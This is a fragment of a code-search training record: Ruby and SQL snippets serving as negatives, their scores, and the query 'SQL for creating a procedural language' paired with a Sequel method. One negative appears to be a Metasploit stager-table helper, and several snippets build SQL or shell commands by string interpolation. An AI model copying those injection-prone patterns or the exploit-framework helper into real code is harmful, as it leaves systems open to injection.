"def create_entry()\n\tdb.execute( \"INSERT INTO test (name, codename) VALUES (?, ?)\", [name, code_name])\n\nend",
"def postgres_create_stager_table\n tbl = Rex::Text.rand_text_alpha(8).downcase\n fld = Rex::Text.rand_text_alpha(8).downcase\n resp = postgres_query(\"create temporary table #{tbl}(#{fld} text)\")\n if resp[:sql_error]\n print_error resp[:sql_error]\n return false\n end\n return [tbl,fld]\n end",
"def add_family(db, name, age)\r\n\tdb.execute(\"INSERT INTO family (name, age) VALUES (?, ?)\", [name, age])\r\nend",
"def new_student (db, name)\n db.execute(\"INSERT INTO student (name) VALUES (?)\", [name])\nend"
] |
[
"0.73484826",
"0.72461474",
"0.72118765",
"0.7096132",
"0.7025482",
"0.6792593",
"0.64558375",
"0.64074355",
"0.6336611",
"0.63190633",
"0.63179994",
"0.6292024",
"0.6202775",
"0.6190527",
"0.61772263",
"0.61308116",
"0.61014944",
"0.6098711",
"0.6088275",
"0.60713166",
"0.60658413",
"0.60509354",
"0.6040112",
"0.6032452",
"0.60302055",
"0.6025913",
"0.599051",
"0.5943064",
"0.5941858",
"0.593028",
"0.5913495",
"0.5872233",
"0.58690614",
"0.5856243",
"0.5851911",
"0.58443487",
"0.584115",
"0.58324784",
"0.58290017",
"0.5823967",
"0.5821156",
"0.581835",
"0.5813372",
"0.5780447",
"0.5777676",
"0.57604074",
"0.5759884",
"0.57372344",
"0.5736603",
"0.5736603",
"0.5732197",
"0.57306",
"0.57243127",
"0.5717095",
"0.5713703",
"0.5712523",
"0.5711732",
"0.5702915",
"0.5697723",
"0.5680729",
"0.56796736",
"0.5676696",
"0.5668158",
"0.5652897",
"0.564514",
"0.5644247",
"0.5634602",
"0.562681",
"0.5626504",
"0.56260633",
"0.5622029",
"0.56190366",
"0.5616368",
"0.561008",
"0.5602867",
"0.5591632",
"0.5589319",
"0.55805993",
"0.5578557",
"0.5576696",
"0.55592114",
"0.555134",
"0.5548442",
"0.55452037",
"0.55298215",
"0.5523163",
"0.5514714",
"0.55143356",
"0.55087924",
"0.55039406",
"0.54987895",
"0.54987895",
"0.54927975",
"0.5486008",
"0.5477251",
"0.5472938",
"0.5457337",
"0.5456962",
"0.54535854",
"0.5450306"
] |
0.7258271
|
1
|
SQL for creating a procedural language.
|
def create_language_sql(name, opts=OPTS)
  "CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{" HANDLER #{opts[:handler]}" if opts[:handler]}#{" VALIDATOR #{opts[:validator]}" if opts[:validator]}"
end
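
For orientation, a hypothetical usage sketch of this SQL generator (the `DB` connection handle and the `send` call are assumptions for illustration; in Sequel this private helper is normally reached through the public `create_language` wrapper visible in the related snippets below):

# Assumed: DB is a Sequel PostgreSQL Database object exposing this method.
DB.send(:create_language_sql, :plpgsql)
# => "CREATE LANGUAGE plpgsql"

DB.send(:create_language_sql, :plperl,
        :replace => true, :trusted => true,
        :handler => :plperl_call_handler,
        :validator => :plperl_validator)
# => "CREATE OR REPLACE TRUSTED LANGUAGE plperl HANDLER plperl_call_handler VALIDATOR plperl_validator"
# (OR REPLACE is emitted only when server_version >= 90000, i.e. PostgreSQL 9.0+.)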
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_language(name, opts=OPTS)\n self << create_language_sql(name, opts)\n end",
"def make_statement\n end",
"def make_statement\n end",
"def sql\n @parser.sql\n end",
"def sql\n @parser.sql\n end",
"def add_code(cheatsheet_db, language, type, code, comment)\n cheatsheet_db.execute(\"INSERT INTO #{language} (type, code, comment) VALUES (?, ?, ?)\", [type, code, comment])\nend",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def to_pg_query(query, language)\n pg_syntax = query.gsub(/\\W+/, \" | \").gsub(/ \\| and \\| /, \" & \").gsub(/ \\| or \\| /, \" | \").gsub(/ \\| not \\| /, \" | !\")\n sanitize_sql_array [\"to_tsquery('#{language}', ?)\", pg_syntax]\n end",
"def sql! sql=nil\n require 'niceql'\n puts Niceql::Prettifier.prettify_sql sql || $last_sql_command\n end",
"def sql(options={})\n get_location\n # TODO: validate options\n @params[:sql] = FEATURE_DEFAULTS[:sql].merge(options)\n @params[:sql][:generate] = true\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def sql\n @context.sql\n end",
"def sql sql\n @master.puts \"#{sql};\"\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def statement; end",
"def sql\n @stmt_api.sql\n end",
"def create_movies_table\n c = connect\n # this is another way to write a string, using %q{}\n c.exec %q{ \n CREATE TABLE movies (\n id SERIAL PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def source_sql\n system \"psql -d #{@base_name} -f #{@sql_path}\"\n end",
"def create_function_sql(name, definition, opts=OPTS)\n args = opts[:args]\n if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}\n returns = opts[:returns] || 'void'\n end\n language = opts[:language] || 'SQL'\n <<-END\n CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}\n #{\"RETURNS #{returns}\" if returns}\n LANGUAGE #{language}\n #{opts[:behavior].to_s.upcase if opts[:behavior]}\n #{'STRICT' if opts[:strict]}\n #{'SECURITY DEFINER' if opts[:security_definer]}\n #{\"PARALLEL #{opts[:parallel].to_s.upcase}\" if opts[:parallel]}\n #{\"COST #{opts[:cost]}\" if opts[:cost]}\n #{\"ROWS #{opts[:rows]}\" if opts[:rows]}\n #{opts[:set].map{|k,v| \" SET #{k} = #{v}\"}.join(\"\\n\") if opts[:set]}\n AS #{literal(definition.to_s)}#{\", #{literal(opts[:link_symbol].to_s)}\" if opts[:link_symbol]}\n END\n end",
"def sql\n <<-SQL\n -- Search learning paths\n SELECT DISTINCT\n c.id,\n c.name,\n c.course_code,\n c.settings,\n cc.content,\n 'learning_path' AS content_type,\n c.id AS learning_path_id,\n 0 AS learning_objective_id\n FROM courses c\n LEFT OUTER JOIN fearless_taggings ts\n ON ts.taggable_id = c.id AND ts.taggable_type = 'LearningPath'\n LEFT OUTER JOIN fearless_tags t\n ON t.id = ts.tag_id\n LEFT OUTER JOIN fearless_custom_contents cc\n ON cc.contentable_id = c.id AND cc.contentable_type = 'LearningPath'\n WHERE 0=0\n #{construct_account_clause}\n #{construct_course_worklow_clause}\n #{construct_name_sql}\n #{construct_all_tags_search('t', 'name')}\n UNION ALL\n -- Search learning objectives\n SELECT DISTINCT\n cm.id,\n cm.name,\n c.course_code,\n c.settings,\n cc.content,\n 'learning_objective' AS content_type,\n cm.context_id::bigint AS learning_path_id,\n cm.id::bigint AS learning_objective_id\n FROM context_modules cm\n INNER JOIN courses c\n ON c.id = cm.context_id\n AND cm.context_type = 'Course'\n LEFT OUTER JOIN fearless_taggings ts\n ON ts.taggable_id = cm.id AND ts.taggable_type = 'LearningObjective'\n LEFT OUTER JOIN fearless_tags t\n ON t.id = ts.tag_id\n LEFT OUTER JOIN fearless_custom_contents cc\n ON cc.contentable_id = cm.id AND cc.contentable_type = 'LearningObjective'\n WHERE 0=0\n #{construct_account_clause}\n #{construct_generic_workflow_clause('cm')}\n #{construct_name_sql('cm')}\n #{construct_all_tags_search('t', 'name')}\n UNION ALL\n -- Search learning learning_event\n SELECT DISTINCT\n ct.id,\n ct.title AS name,\n c.course_code,\n c.settings,\n cc.content,\n 'learning_event' AS content_type,\n ct.context_id::bigint AS learning_path_id,\n ct.context_module_id::bigint AS learning_objective_id\n FROM content_tags ct\n INNER JOIN courses c\n ON c.id = ct.context_id\n AND ct.context_type = 'Course'\n LEFT OUTER JOIN fearless_taggings ts\n ON ts.taggable_id = ct.id AND ts.taggable_type = 'LearningEvent'\n LEFT OUTER JOIN fearless_tags t\n ON t.id = ts.tag_id\n LEFT OUTER JOIN fearless_custom_contents cc\n ON cc.contentable_id = ct.id AND cc.contentable_type = 'LearningEvent'\n WHERE 0=0\n #{construct_account_clause}\n #{construct_generic_workflow_clause('ct')}\n #{construct_name_sql('ct', 'title')}\n #{construct_all_tags_search('t', 'name')}\n SQL\n end",
"def build_cmd(sql)\n # Only exists within the context of this script (not exported), so this\n # does not degrade security posture after the script has completed\n ENV['PGPASSWORD'] = conn_opts[:password] if conn_opts.has_key? :password\n\n cmd = \"psql\"\n cmd << \" -d #{conn_opts[:database]}\" if conn_opts.has_key? :database\n cmd << \" -h #{conn_opts[:host]}\" if conn_opts.has_key? :host\n cmd << \" -U #{conn_opts[:username]}\" if conn_opts.has_key? :username\n cmd << \" -p #{conn_opts[:port]}\" if conn_opts.has_key? :port\n cmd << \" -c \\\"#{sql}\\\"\"\n\n return cmd\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def display_query_sql(users)\n tag.p('SQL:') + tag.code(users.to_sql)\n end",
"def sql_literal(*)\n @dataset.sql\n end",
"def boring_parrot(statement)\n statement\nend",
"def oracle; end",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
"def sql(string)\n ::Arel::Nodes::SqlLiteral.new(string)\n end",
"def build_sql(structure)\n structure = structure.is_a?(Constructor) ? structure.structure : structure\n sql = ''\n [:with, :union, :select, :insert, :update, :delete, :set, :from,\n :join, :where, :returning, :group, :order, :limit, :offset].each do |i|\n next unless structure[i]\n sql += send(\"build_#{i}\", structure[i], structure)\n end\n sql\n end",
"def generate(options)\n title = options[:title]\n # leader_names = options[:leader_names]\n column_names = options[:column_names]\n # headings = options[:headings]\n # follower_names = options[:follower_names]\n # headings = options[:headings]\n filename = options[:sql][:filename]\n # header = options[:sql][:header]\n\n @transforms = options[:transforms]\n @converter = options[:converter]\n\n\n max_size = -1\n column_names.each { |cn| max_size = cn.size if cn.size > max_size }\n\n sql_file = File.open(filename.to_s, 'w')\n\n sql_file.puts <<~EOS\n -- ==============================================================\n -- == File: #{filename}\n\n DROP TABLE IF EXISTS #{title.variablize('snake_case')};\n\n CREATE TABLE \"public\".\"#{title.variablize('snake_case')}\" (\n EOS\n\n if add_column? :id\n sql_file.puts %Q[ \"id\" INTEGER DEFAULT nextval('#{title.variablize('snake_case')}_id_seq'::regclass) NOT NULL UNIQUE,]\n end\n\n if add_column? :unique_id\n sql_file.puts %Q[ \"unique_id\" CHARACTER VARYING( 255 ) COLLATE \"pg_catalog\".\"default\",]\n end\n\n sql_file.puts '--'\n column_names.each do |col_name|\n spaces = \" \" * (max_size - col_name.size + 2)\n sql_file.print %Q' \"#{col_name}\" ' + spaces + get_type(col_name)\n # SMELL: must we always mod the source when new additional columns are added after spreadsheet?\n # TODO: need to have some kind of before and after feature for the added columns.\n if !(col_name == column_names.last) ||\n add_column?(:report_date) ||\n add_column?(:created_at) ||\n add_column?(:updated_at)\n sql_file.puts ','\n else\n sql_file.puts\n end\n end\n sql_file.puts '--'\n\n # SNELL: the last column name does not get a comma; but don't know which is last\n\n if add_column? :report_date\n sql_file.print '\"report_date\" Date'\n if add_column?(:created_at) || add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :created_at\n sql_file.print '\"created_at\" Date'\n if add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :updated_at\n sql_file.puts '\"updated_at\" Date'\n end\n\n if add_column? :id\n sql_file.puts ' PRIMARY KEY ( \"id\" )'\n end\n\n sql_file.print \");\\n\\n\"\n\n sql_file.close\n\n\nap @@add_columns if verbose? || debug?\n\n\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def create_genre(db)\r\n create_genre_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS genre(\r\n genre_id INTEGER PRIMARY KEY,\r\n genre_name VARCHAR(255)\r\n )\r\n SQL\r\n #create table genre\r\n db.execute(create_genre_cmd)\r\nend",
"def generate(name, symbol, typeInfo)\n ptl = typeInfo.parameterLists[0]\n return <<EOF\n\n/**\n * Create expression for GLSL operator '#{symbol}'.\n *\n#{ptl.toClosureAnnotation}\n * @return {!embedsl.Expression} Created expression.\n */\nembedsl.lang.#{name} = (function() {\n var cached = #{typeInfo.toEsl};\n return function(#{ptl.toParameterList}) {\n var args = Array.prototype.slice.call(arguments);\n return new embedsl.Expression(\n embedsl.Kind.OPERATOR, cached, '#{name}', '#{symbol}', args);\n };\n})();\nEOF\nend",
"def schema_table_projets\n <<-MYSQL\nCREATE TABLE projets\n (\n # ID\n # --\n # IDentifiant du projet, pas forcément le même que l'ID\n # du programme auquel il est associé.\n id INTEGER AUTO_INCREMENT,\n\n # TITRE\n # ------\n # Titre du projet\n # Il n'est pas obligatoire et, surtout, il n'est pas encore\n # défini à la création du projet. Par défaut, on met \"sans titre\"\n titre VARCHAR(255) DEFAULT 'Sans titre',\n\n # AUTEUR_ID\n # ---------\n # ID de l'auteur du projet\n auteur_id INTEGER NOT NULL,\n\n # PROGRAM_ID\n # ----------\n # ID du programme auquel est associé le projet.\n # C'est une valeur non nulle car un projet ne peut pas\n # être dissocié d'un programme ÉCRIRE UN ROMAN/FILM EN UN AN\n program_id INTEGER NOT NULL,\n\n # RÉSUMÉ\n # ------\n # Le résumé (littéraire) du projet\n resume TEXT,\n\n # SPECS\n # -----\n # Spécificités du projet, comme le fait que ce soit un\n # roman, etc.\n # Chaque bit représente une spécificité. Cf. le fichier\n # ./objet/unan/lib/required/projet/specs.rb pour le détail.\n specs VARCHAR(32),\n\n # CREATED_AT\n # ----------\n # Timestamp de la création du projet\n created_at INTEGER(10),\n\n # UPDATED_AT\n # ----------\n # Timestamp de la modification de cette donnée\n updated_at INTEGER(10),\n\n\n PRIMARY KEY (id)\n );\n MYSQL\nend",
"def open_procedure_literal\r\n suspend_execute_mode(\"vm.push(lambda {|vm, val=nil, idx=nil| \", :procedure)\r\n\r\n #Support for the standard procedure parameters.\r\n context.create_local_method('v', MacroSpec, [:macro, \"vm.push(val); \"])\r\n context.create_local_method('x', MacroSpec, [:macro, \"vm.push(idx); \"])\r\n\r\n #Support for local data.\r\n context.create_local_method('var:', LocalSpec, [:immediate], &Local_Var_Action)\r\n context.create_local_method('val:', LocalSpec, [:immediate], &Local_Val_Action)\r\n\r\n context.create_local_method('}}', MacroSpec, [:macro, :end, \"}); \"])\r\n end",
"def coding_with_language(#{name}, #{language})\n puts \"Hi, my name is #{name} and I am learning to program in #{language}!\"\nend",
"def psql_db_command__cli psql_db\n psql_db_command__program \"psql\", psql_db\n end",
"def generate\n tree = generate_syntax_tree\n source = []\n\n tree.butfirst.each do |production|\n non_terminal = production.first\n\n if non_terminal == :statement\n terminals = production.butfirst\n procedure = terminals.first\n arguments = terminals.butfirst\n\n # If we encounter an unknown procedure, we have to consider\n # it a fatal error.\n if mnemonic_exists?(procedure)\n source << eval_procedure(procedure, arguments)\n else\n raise Bolverk::ASM::SemanticError, \"Unknown procedure: '#{procedure.value}' at line #{procedure.line}.\"\n end\n end\n end\n\n source.join(\"\\n\")\n end",
"def create_psql_cmd(query, db)\n \"su postgres -c \\\"psql -d #{db} -p #{@port} -q -t -c #{escaped_query(query)}\\\"\"\n end",
"def create(language, body)\n Statements::CreateFunction\n .new(context: self, language: language, body: body)\n end",
"def function_sql(f)\n args = f.args\n \"#{f.f}#{args.empty? ? '()' : literal(args)}\"\n end",
"def getSqlSm (ask,type,number,questionChild)\r\n name=\"#{type}_#{number}\"\r\n listOptions = getListOptions(questionChild,\"option\")\r\n erbTemplate = getTemplate(\"../encuestas/templates/sql_sm.template\",binding)\r\n return erbTemplate.to_s\r\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def to_sql\n\n # Hide Amex numbers\n# if (!@titolo_name.nil?) \n# if (@categoria_name == \"AMERICAN EXPRESS\" || @categoria_name == \"BANK OF AMERICA\") \n# @titolo_name.gsub!(/\\*.*\\*/, \"\");\n# end\n# end\n\n \n\n return \"INSERT INTO expenses (`created`, `anno`, `missione_title`, `missione_id`, `categoria_title`, `categoria_code`, `titolo_name`, `amministrazione_id`, `amministrazione_title`, `programma_id`, `programma_title`, `pagamenti_residui`,`pagamenti_totali`) VALUES (NOW(), '#{@anno}','#{@missione_title.to_s.gsub(/\\\\/,'\\&\\&').gsub(/'/,\"''\")}', '#{@missione_id}', '#{@categoria_title.to_s.gsub(/'/, \"''\")}', '#{@categoria_code}', '#{@titolo_name.to_s.gsub(/\\\\/, '\\&\\&').gsub(/'/, \"''\")}', '#{@amministrazione_id}', '#{@amministrazione_title.to_s.gsub(/\\\\/, '\\&\\&').gsub(/'/, \"''\")}', '#{@programma_id}', '#{@programma_title.to_s.gsub(/\\\\/, '\\&\\&').gsub(/'/, \"''\")}', #{@pagamenti_residui.gsub(/,/, \"\")}), #{@pagamenti_totali.gsub(/,/, \"\")});\"\n end",
"def sql_modes; end",
"def get_sql(structure, options)\n # get_partial_sql structure, key: 'sql'\n wrap_result send(\"build_#{options[:key] || 'sql'}\", structure)\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def to_script\n s = TRANSACTION_START[db_type].dup\n s << \"\\n\"\n rows.each {|r| s << r.insert_sql(db_type) }\n s << \"#{TRANSACTION_END[db_type]}\\n\"\n s\n end",
"def psql_db_command__program psql_program, psql_db\n shell_params_psql_db = quoted_shell_params psql_db\n db_name,\n db_user,\n db_password,\n db_host,\n reserved = shell_params_psql_db\n\n psql_command = \"PGPASSWORD=#{db_password} #{psql_program} -h #{db_host} -U #{db_user} #{db_name} \"\n end",
"def generate_sql\n @sql_path = \"#{File.dirname(@file_path)}/#{@base_name}.geoloader.sql\"\n system \"shp2pgsql #{@file_path} > #{@sql_path}\"\n end",
"def target_sql_mode=(_arg0); end",
"def execute sql\n db[sql]\n end",
"def psql(args)\n \"psql -X -q #{args}\"\nend",
"def compile_statement\n # write_tag '<statement>'\n return compile_let_statement if check?(TokenType::LET)\n return compile_while_statement if check?(TokenType::WHILE)\n return compile_do_statement if check?(TokenType::DO)\n return compile_return_statement if check?(TokenType::RETURN)\n return compile_if_statement if check?(TokenType::IF)\n # write_tag '</statement>'\n end",
"def physics_no_chemistry\n # In which years was the Physics prize awarded, but no Chemistry prize?\n execute(<<-SQL)\n SQL\nend",
"def statement \n\n\t$cst.add_branch(\"Statement\")\n\n\tcase scout_token\n\twhen \"T_PRINT\"\n\t\tprint_stmt\n\twhen \"T_ID\"\n\t\tassignment_stmt\n\twhen \"T_TYPE\"\n\t\tvardecl\n\twhen \"T_WHILE\"\n\t\twhile_stmt\n\twhen \"T_IF\"\n\t\tif_stmt\n\twhen \"T_LBRACE\"\n\t\tblock\n\telse\n\t\traise FaultyTokenError.new(\"T_PRINT, T_ID, T_TYPE, T_WHILE, T_IF, or T_LBRACE\", $tokens[$index])\n\tend\n\t\n\t$cst.ascend\n\t\nend",
"def initialize(fname=\"\", lname=\"\", email=\"\")\n @fname = fname\n @lname = lname\n @email = email\n\n puts `psql -d wdi-november -c \"INSERT INTO users (fname, lname, email) VALUES ('#{fname}','#{lname}', '#{email}')\"`\nend",
"def as_sql(expression, aliaz)\n \"#{expression} #{quote_identifier(aliaz)}\"\n end",
"def statement_text\n text_as_statement || text\n end",
"def create_interpreter \n template 'interpreter', \"lib/batch_load/import/#{table_name}/#{batch_loader_name}_interpreter.rb\"\n end",
"def create_main_course(db, name, main_course_descr)\n db.execute(\"INSERT INTO main_course (name, main_course_descr) VALUES (?, ?)\", [name, main_course_descr])\nend",
"def execute(sql, name = nil)\n # check for some DDL and DML statements\n puts \"Running sql? #{RUN_SQL}\"\n\n if /(create |alter |drop |insert |delete |update )/i.match sql.squish\n File.open(SQL_FILENAME, 'a') { |f| f.puts \"#{sql};\\n\" }\n puts \"Rails.env: #{Rails.env} - #{ENV['FPHS_POSTGRESQL_SCHEMA']}\"\n old_execute sql, name if RUN_SQL\n else\n # pass everything else to the aliased execute\n puts \"------------- (#{name}) ---------------\"\n puts sql || ''\n puts \"------------- ---------------\"\n old_execute sql, name if RUN_SQL\n end\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def run_sql(sql)\n\tconn = PG.connect(dbname: \"video_store\", host: 'localhost')\n\tresult = conn.exec(sql)\n\tconn.close\n\tresult \nend",
"def run_sql(sql)\n connection = PG.connect(dbname: \"facebook_lab\", host: \"localhost\")\n result = connection.exec(sql)\n connection.close\n result\nend",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def sql\n Slacker.sql(self)\n end",
"def commence\n @vm, = API.compile( @db.handle, @sql )\n\n @current_row = API.step( @vm )\n\n @columns = @current_row[ :columns ]\n @types = @current_row[ :types ]\n\n check_eof( @current_row )\n end",
"def execute(sql, name = nil) \n # Only skip select statements from logging \n unless /^(select|show|begin|commit)/i.match(sql.strip) \n\t\tFile.open( File.join(RAILS_ROOT, 'db', 'ddl.sql'),'a') {|f|\n\t\t\ttemp_sql = sql.gsub(\"\\n\",\"\") \n\t\t\ttemp_sql = temp_sql + ';' if adapter_name != 'IBM_DB2' or adapter_name != 'IBM_DB'\n\t\t\tf.puts temp_sql\n\t\t}\n end\n\t old_execute sql, name\n end",
"def psql\n uri = generate_ingress_uri(\"Connecting\")\n ENV[\"PGPASSWORD\"] = uri.password\n ENV[\"PGSSLMODE\"] = 'require'\n system \"psql -U #{uri.user} -h #{uri.host} -p #{uri.port || 5432} #{uri.path[1..-1]}\"\n end",
"def generate2sql(w)\n File.open(@filename_target, 'w') {|file| file.write(w)}\nend",
"def target_sql_mode; end",
"def get_ddl(cfg)\n <<-EOS\n CREATE TABLE operations (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(100) NOT NULL,\n txid VARCHAR(100) NOT NULL,\n amount DECIMAL(16,8) NOT NULL,\n block_height INTEGER NOT NULL,\n block_hash VARCHAR(100) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`),\n KEY `idx_txid` (`txid`),\n UNIQUE KEY `idx_address_txid` (`address`, `txid`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n CREATE TABLE addresses (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(255) DEFAULT NULL,\n total_received DECIMAL(16,8) DEFAULT NULL,\n balance DECIMAL(16,9) DEFAULT NULL,\n n_tx INTEGER NOT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n EOS\n end",
"def to_sql\n @sql ||= case @kind\n when :target, :comp_op, :bin_bool_op, :term\n child(0).to_sql\n when :target_set\n # array of fragments, one per target\n [child(0).to_sql] + (child(1) ? child(2).to_sql : [])\n when :qual_term\n # child(2) will be an array (target_set)\n \"(\" + child(2).to_sql.collect{|sql| comparison(child(0), child(1).child(0), sql)}.join(\" OR \") + \")\"\n when :unqual_term\n \"(\" + default_quals.collect{|q| comparison(q, EQUAL_TOKEN, child(0).to_sql)}.join(\" OR \") + \")\"\n when :query\n # first form\n if child(0).is?(:lparen)\n @children.collect{|c| c.to_sql}.join\n # second form\n elsif child(1) && child(1).is?(:bin_bool_op)\n @children.collect{|c| c.to_sql}.join(\" \")\n # third form\n elsif child(1) && child(1).is?(:query)\n child(0).to_sql + \" AND \" + child(1).to_sql\n # fourth form\n else\n child(0).to_sql\n end\n end\n end",
"def introduction_with_language(name,language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def string\n @sql_string = \"SELECT #{@select} FROM #{@from}#{@join} WHERE #{@where};\"\n end",
"def sql_statement_all\n @sql_statement_all ||=\n <<-SQL\n SELECT\n applications.id AS id,\n teams.name AS team_name,\n projects.name AS project_name,\n (application_data -> :project_id)::int AS project_id,\n application_data -> :signed_off_at AS signed_off_at,\n (application_data -> :signed_off_by)::int AS signed_off_by,\n application_data -> :mentor_fav AS mentor_fav,\n CASE WHEN :project_id::text = 'project1_id' THEN 1 ELSE 2 END AS choice\n FROM applications\n INNER JOIN teams\n ON teams.id = applications.team_id\n INNER JOIN projects\n ON projects.id::text = applications.application_data -> :project_id\n WHERE (application_data -> :project_id)::int IN (:project_ids)\n AND applications.season_id = :season_id;\n SQL\n end",
"def run_sql(sql)\n\tdb = PG.connect(dbname: 'address_book', host: 'localhost')\n\tresult = db.exec(sql)\n\tdb.close\n\tresult\nend",
"def run_sql(sql)\n conn = PG.connect(dbname: 'goodfoodhunting')\n result = conn.exec(sql)\n conn.close\n return result\nend",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def get_procedures\n connect_db.fetch(\"SELECT RDB$PROCEDURE_NAME, RDB$PROCEDURE_SOURCE FROM RDB$PROCEDURES\")\n end",
"def pa\n return VasmGrammar.new, VasmTransform.new\nend",
